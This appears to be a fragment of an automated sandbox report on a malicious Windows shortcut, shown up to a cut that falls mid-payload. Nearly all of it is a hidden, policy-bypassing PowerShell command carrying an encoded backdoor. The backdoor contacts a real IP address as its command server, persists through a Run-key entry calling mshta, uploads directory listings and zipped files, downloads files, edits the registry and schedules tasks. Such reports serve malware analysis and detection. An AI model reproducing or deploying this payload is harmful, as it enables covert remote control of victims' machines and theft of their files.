file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAOAA1ADsAJABPAGsAUwBEAEwAbABXAGMAVgBmAG4AcQBvAG8AIAA9ACAAMQAwADIANAAgACoAIAAxADAAMgA0ADsAJABvAHUAawBjAHYAVQBGAFAAaAAgAD0AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIAArACAAJwAtACcAIAArACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7ACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAPQAgACcAaAB0AHQAcAA6AC8ALwA3ADUALgAxADEAOQAuADEAMwA2AC4AMgAwADcALwBjAG8AbgBmAGkAZwAvAGIAYQBzAGUAcwAvAGMAbwBuAGYAaQBnAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJABvAHUAawBjAHYAVQBGAFAAaAA7ACQAeQB5AFUAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAGcAWQBOAEMAcQBDAFEAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB5AHkAVQApACkAIAB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAgAC0ATgBhAG0AZQAgAG0ATwBUAEMASwBkACAALQBWAGEAbAB1AGUAIAAnAGMAOgBcAHcAaQBuAGQAbwB3AHMAXABzAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACAALwBjACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0ATgBvAEwAbwBnAG8AIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0AZQBwACAAYgB5AHAAYQBzAHMAIABwAGkAbgBnACAALQBuACAAMQAgAC0AdwAgADUANgAzADkANAAyACAAMgAuADIALgAyAC4AMgAgAHwAfAAgAG0AcwBoAHQAYQAgAGgAdAB0AHAAOgAvAC8ANwA1AC4AMQAxADkALgAxADMANgAuADIAMAA3AC8AYwBvAG4AZgBpAGcALwBiAGEAcwBlAHMALwAxAC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFUAbABVAG0ATAAoACQAQwBzAEQAdAAsACAAJABXAFoAaABsAHYAbQBJAGQAbgApAHsAJABDAGYAcwBXAEkARQBuAE8ASQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAFcAWgBoAGwAdgBtAEkAZABuACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAbgBGAFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACQAQwBzAEQAdAApADsAJABuAEYAWgAuAE0AZQB0AGgAbwBkACAAPQAgACcAUABPAFMAVAAnADsAJABuAEYAWgAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALgBMAGUAbgBnAHQAaAA7ACQAeQB5AFUAVQAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALAAgADAALAAgACQAQwBmAHMAVwBJAEUAbgBPAEkAcgAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJAB5AHkAVQBVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAQgBhAGkAVQBIAFUAUQBiAHoAUQBKAEEAcwAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcALAAgACQAeABkAEgASwBEAHYARgBNACwAIAAkAEMATgBHAG4AdwBXACkAewAkAFQAaQBtAGUAbwB1AHQAPQAxADAAMAAwADAAMAAwADAAOwAkAEMAUgBMAEYAIAA9ACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABEACkAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABBACkAOwAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAA9ACAAJwAtAC0AJwA7ACQAQgBvAHUAbgBkAGEAcgB5ACAAPQAgACcAKgAqACoAKgAqACcAOwAkAHMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AE8AcABlAG4AUgBlAGEAZAAoACQAZgByAFIAWQBtAHcAYgB3ACkAOwAkAGcAQgBGAHYAUABnAGIAWgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAE8AawBTAEQATABsAFcAYwBWAGYAbgBxAG8AbwA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAZwBCAEYAdgBQAGcAYgBaACwAMAAsACQATwBrAFMARABMAGwAVwBjAFYAZgBuAHEAbwBvACkAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABuAEYAWgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHMARAB0ACkAOwAkAG4ARgBaAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAG4ARgBaAC4AVABpAG0AZQBvAHUAdAAgAD0AIAAkAFQAaQBtAGUAbwB1AHQAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABUAHkAcABlACAAPQAgACcAbQB1AGwAdABpAHAAYQByAHQALwBmAG8AcgBtAC0AZABhAHQAYQA7AGIAbwB1AG4AZABhAHIAeQA9ACcAIAArACAAJABCAG8AdQBuAGQAYQByAHkAOwAkAHkAeQBVAFUAIAA9ACAAJABuAEYAWgAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAxACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMQAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuADoAIABmAG8AcgBtAC0AZABhAHQAYQA7ACAAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AGQASABLAEQAdgBGAE0AIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAE4ARwBuAHcAVwAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAyACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMgAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAFIATABGACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJAB5AHkAVQBVAC4AVwByAGkAdABlACgAJABnAEIARgB2AFAAZwBiAFoALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAzACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMwAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcANAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0AJABzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHcAWQBsAGIAZABoAFUARgBEAGwAcgAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAcwBEAHQAKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAZgByAFIAWQBtAHcAYgB3ACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJABKAE4AZgAgAD0AIABVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACcAJwA7AEkAZgAgACgAJABKAE4AZgAgAC0AbgBlACAAJwBuAHUAbABsACcAIAAtAGEAbgBkACAAJABKAE4AZgAgAC0AbgBlACAAJwAnACkAewAkAEoATgBmAD0AJABKAE4AZgAuAFMAdQBiAFMAdAByAGkAbgBnACgAMQAsACAAJABKAE4AZgAuAEwAZQBuAGcAdABoACAALQAgADIAKQA7ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABKAE4AZgApACkAOwBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgApAHsAaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAHkAeQBVACAAKwAgACcALgBjAHMAdgAnADsARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAUQBCAGkAYQAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwBCAGEAaQBVAEgAVQBRAGIAegBRAEoAQQBzACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABpAHIAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAUQBCAGkAYQApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJAB5AHkAVQAgACsAIAAnAC4AegBpAHAAJwA7AEMAbwBtAHAAcgBlAHMAcwAtAEEAcgBjAGgAaQB2AGUAIAAkAFEAQgBpAGEAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAZgBpAGwAZQBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFEAQgBpAGEAKQB7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAUQBCAGkAYQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAbwB3AG4AOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AHcAWQBsAGIAZABoAFUARgBEAGwAcgAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBnAGUAZABpAHQAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgAOAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVgBhAGwAdQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHQAYQBzAGsAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkA